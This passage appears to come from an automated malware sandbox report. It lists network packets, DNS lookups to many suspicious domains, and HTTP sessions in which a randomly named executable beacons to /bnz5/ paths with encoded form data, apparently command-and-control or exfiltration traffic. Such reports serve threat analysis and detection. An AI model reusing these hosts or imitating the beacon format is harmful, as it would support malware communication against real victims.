                                                                                                      Apr 16, 2024 12:03:19.218570948 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218647003 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218692064 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218741894 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:19.218981981 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.218982935 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.219084024 CEST4977280192.168.2.5174.138.177.173
                                                                                                      Apr 16, 2024 12:03:19.342293024 CEST8049772174.138.177.173192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.222795010 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.433579922 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.433763981 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.433867931 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:24.647996902 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.648032904 CEST804977391.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:24.648138046 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:25.942806005 CEST4977380192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:26.955369949 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.166718960 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.166949987 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.167047024 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:27.378807068 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.378825903 CEST804977491.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:27.378879070 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:28.673981905 CEST4977480192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.689799070 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.900912046 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:29.900983095 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:29.901143074 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:30.112095118 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114063978 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114079952 CEST804977591.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:30.114125967 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:31.408308983 CEST4977580192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.424096107 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.635715961 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.635921001 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.635921001 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.848392010 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.848414898 CEST804977691.195.240.117192.168.2.5
                                                                                                      Apr 16, 2024 12:03:32.848575115 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:32.848575115 CEST4977680192.168.2.591.195.240.117
                                                                                                      Apr 16, 2024 12:03:33.060328007 CEST804977691.195.240.117192.168.2.5

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 16, 2024 11:59:23.445981026 CEST6456253192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 11:59:23.606070995 CEST53645621.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 11:59:38.893559933 CEST5508653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 11:59:39.074093103 CEST53550861.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 11:59:52.847184896 CEST5057253192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 11:59:53.148156881 CEST53505721.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:00:07.331526995 CEST5332953192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:00:08.185420036 CEST53533291.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:00:23.440696001 CEST5062353192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:00:23.592402935 CEST53506231.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:00:37.237806082 CEST6325553192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:00:37.380256891 CEST53632551.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:00:51.019445896 CEST5705153192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:00:51.172542095 CEST53570511.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:01:04.299877882 CEST6312953192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:01:04.523947954 CEST53631291.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:01:17.909513950 CEST5432953192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:01:18.504334927 CEST53543291.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:01:32.815421104 CEST5934953192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:01:33.682200909 CEST53593491.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:01:50.065558910 CEST5648253192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:01:51.032918930 CEST53564821.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:05.130003929 CEST6427753192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:06.142855883 CEST6427753192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:07.142797947 CEST6427753192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:09.158792019 CEST6427753192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:11.477787971 CEST53642771.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:11.477802038 CEST53642771.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:11.477809906 CEST53642771.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:11.477818966 CEST53642771.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:12.487287998 CEST5266653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:13.486823082 CEST5266653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:14.486685038 CEST5266653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:16.502357006 CEST5266653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:19.190126896 CEST53526661.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:19.190186977 CEST53526661.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:19.190222025 CEST53526661.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:19.190257072 CEST53526661.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:20.206198931 CEST5869653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:20.311439037 CEST53586961.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:26.330928087 CEST6238653192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:26.565226078 CEST53623861.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:40.206028938 CEST5317053192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:40.378747940 CEST53531701.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:02:53.643583059 CEST6277353192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:02:54.148458958 CEST53627731.1.1.1192.168.2.5
                                                                                                      Apr 16, 2024 12:03:07.768330097 CEST5798253192.168.2.51.1.1.1
                                                                                                      Apr 16, 2024 12:03:07.875504971 CEST53579821.1.1.1192.168.2.5

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Apr 16, 2024 11:59:23.445981026 CEST192.168.2.51.1.1.10x386aStandard query (0)www.elysiangame.onlineA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 11:59:38.893559933 CEST192.168.2.51.1.1.10xa895Standard query (0)www.blueberry-breeze.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 11:59:52.847184896 CEST192.168.2.51.1.1.10xd39Standard query (0)www.collegeclubapparel.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:07.331526995 CEST192.168.2.51.1.1.10xfa82Standard query (0)www.vvbgsekbo.storeA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:23.440696001 CEST192.168.2.51.1.1.10xad12Standard query (0)www.mytemplotech.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:37.237806082 CEST192.168.2.51.1.1.10xe7a2Standard query (0)www.othlastore.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:51.019445896 CEST192.168.2.51.1.1.10xd615Standard query (0)www.book-of-degen.xyzA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:04.299877882 CEST192.168.2.51.1.1.10xd00dStandard query (0)www.fusionndustries.xyzA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:17.909513950 CEST192.168.2.51.1.1.10x2b45Standard query (0)www.66bm99.shopA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:32.815421104 CEST192.168.2.51.1.1.10x5a99Standard query (0)www.wedgetechflash.co.keA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:50.065558910 CEST192.168.2.51.1.1.10x2617Standard query (0)www.ojyphyi.websiteA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:05.130003929 CEST192.168.2.51.1.1.10xe6baStandard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:06.142855883 CEST192.168.2.51.1.1.10xe6baStandard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:07.142797947 CEST192.168.2.51.1.1.10xe6baStandard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:09.158792019 CEST192.168.2.51.1.1.10xe6baStandard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:12.487287998 CEST192.168.2.51.1.1.10x2f33Standard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:13.486823082 CEST192.168.2.51.1.1.10x2f33Standard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:14.486685038 CEST192.168.2.51.1.1.10x2f33Standard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:16.502357006 CEST192.168.2.51.1.1.10x2f33Standard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:20.206198931 CEST192.168.2.51.1.1.10xe1d2Standard query (0)www.drjoserizal.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:26.330928087 CEST192.168.2.51.1.1.10x4ab4Standard query (0)www.myspinpods.comA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:40.206028938 CEST192.168.2.51.1.1.10xd50fStandard query (0)www.seatheskydesign.onlineA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:53.643583059 CEST192.168.2.51.1.1.10x607bStandard query (0)www.naglissere.ruA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:03:07.768330097 CEST192.168.2.51.1.1.10x6ab2Standard query (0)www.aretikokkoris.comA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Apr 16, 2024 11:59:23.606070995 CEST1.1.1.1192.168.2.50x386aNo error (0)www.elysiangame.online174.138.177.173A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 11:59:39.074093103 CEST1.1.1.1192.168.2.50xa895No error (0)www.blueberry-breeze.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 11:59:53.148156881 CEST1.1.1.1192.168.2.50xd39No error (0)www.collegeclubapparel.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:08.185420036 CEST1.1.1.1192.168.2.50xfa82No error (0)www.vvbgsekbo.store43.132.191.179A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:23.592402935 CEST1.1.1.1192.168.2.50xad12No error (0)www.mytemplotech.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:37.380256891 CEST1.1.1.1192.168.2.50xe7a2No error (0)www.othlastore.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:00:51.172542095 CEST1.1.1.1192.168.2.50xd615No error (0)www.book-of-degen.xyz75.2.60.5A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:04.523947954 CEST1.1.1.1192.168.2.50xd00dNo error (0)www.fusionndustries.xyz203.161.50.128A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:18.504334927 CEST1.1.1.1192.168.2.50x2b45No error (0)www.66bm99.shopccxx.cat-dragon-diiojsofso.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:18.504334927 CEST1.1.1.1192.168.2.50x2b45No error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.172A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:18.504334927 CEST1.1.1.1192.168.2.50x2b45No error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.173A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:18.504334927 CEST1.1.1.1192.168.2.50x2b45No error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.171A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:33.682200909 CEST1.1.1.1192.168.2.50x5a99No error (0)www.wedgetechflash.co.kewedgetechflash.co.keCNAME (Canonical name)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:33.682200909 CEST1.1.1.1192.168.2.50x5a99No error (0)wedgetechflash.co.ke37.61.232.138A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:01:51.032918930 CEST1.1.1.1192.168.2.50x2617No error (0)www.ojyphyi.website103.66.94.182A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:11.477787971 CEST1.1.1.1192.168.2.50xe6baServer failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:11.477802038 CEST1.1.1.1192.168.2.50xe6baServer failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:11.477809906 CEST1.1.1.1192.168.2.50xe6baServer failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:11.477818966 CEST1.1.1.1192.168.2.50xe6baServer failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190126896 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190186977 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190222025 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:19.190257072 CEST1.1.1.1192.168.2.50x2f33Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:20.311439037 CEST1.1.1.1192.168.2.50xe1d2Server failure (2)www.drjoserizal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:26.565226078 CEST1.1.1.1192.168.2.50x4ab4No error (0)www.myspinpods.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:40.378747940 CEST1.1.1.1192.168.2.50xd50fNo error (0)www.seatheskydesign.online66.96.162.136A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:02:54.148458958 CEST1.1.1.1192.168.2.50x607bNo error (0)www.naglissere.ru185.215.4.13A (IP address)IN (0x0001)false
                                                                                                      Apr 16, 2024 12:03:07.875504971 CEST1.1.1.1192.168.2.50x6ab2Name error (3)www.aretikokkoris.comnonenoneA (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.elysiangame.online
                                                                                                      • www.blueberry-breeze.com
                                                                                                      • www.collegeclubapparel.com
                                                                                                      • www.vvbgsekbo.store
                                                                                                      • www.mytemplotech.com
                                                                                                      • www.othlastore.com
                                                                                                      • www.book-of-degen.xyz
                                                                                                      • www.fusionndustries.xyz
                                                                                                      • www.66bm99.shop
                                                                                                      • www.wedgetechflash.co.ke
                                                                                                      • www.ojyphyi.website
                                                                                                      • www.myspinpods.com
                                                                                                      • www.seatheskydesign.online
                                                                                                      • www.naglissere.ru

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549717174.138.177.173802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:23.736241102 CEST454OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1
                                                                                                      Host: www.elysiangame.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 11:59:23.859477997 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1251
                                                                                                      date: Tue, 16 Apr 2024 09:59:23 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) ins
                                                                                                      Apr 16, 2024 11:59:23.859514952 CEST218INData Raw: 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65
                                                                                                      Data Ascii: et;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.54971891.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:39.286670923 CEST727OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 71 47 57 71 4b 52 39 63 50 68 6c 78 45 6c 32 55 63 35 41 6d 62 46 70 65 36 33 34 32 6a 31 47 6e 4d 4e 66 75 78 76 77 4a 57 6b 46 2b 49 6b 6b 6a 66 76 67 39 52 74 41 67 6b 71 4f 57 6e 59 35 72 68 55 54 2f 63 63 76 78 50 45 62 31 57 2f 55 68 55 31 71 44 48 38 2b 48 37 6d 4d 64 65 38 5a 4c 32 36 41 51 59 30 76 74 68 50 71 34 6a 45 64 31 44 78 63 41 57 48 34 34 55 72 6b 79 31 52 6b 70 44 66 4c 63 33 31 31 74 6e 65 52 4e 6c 72 30 7a 63 6c 5a 65 59 35 4e 43 68 36 6b 6d 6a 4f 4f 49 74 67 50 4f 53 52 52 57 47 68 79 36 6b 36 71 49 54 31 6f 4e 67 51 6c 39 67 58 41 3d
                                                                                                      Data Ascii: gr=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeY5NCh6kmjOOItgPOSRRWGhy6k6qIT1oNgQl9gXA=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.54971991.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 11:59:42.027034998 CEST747OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
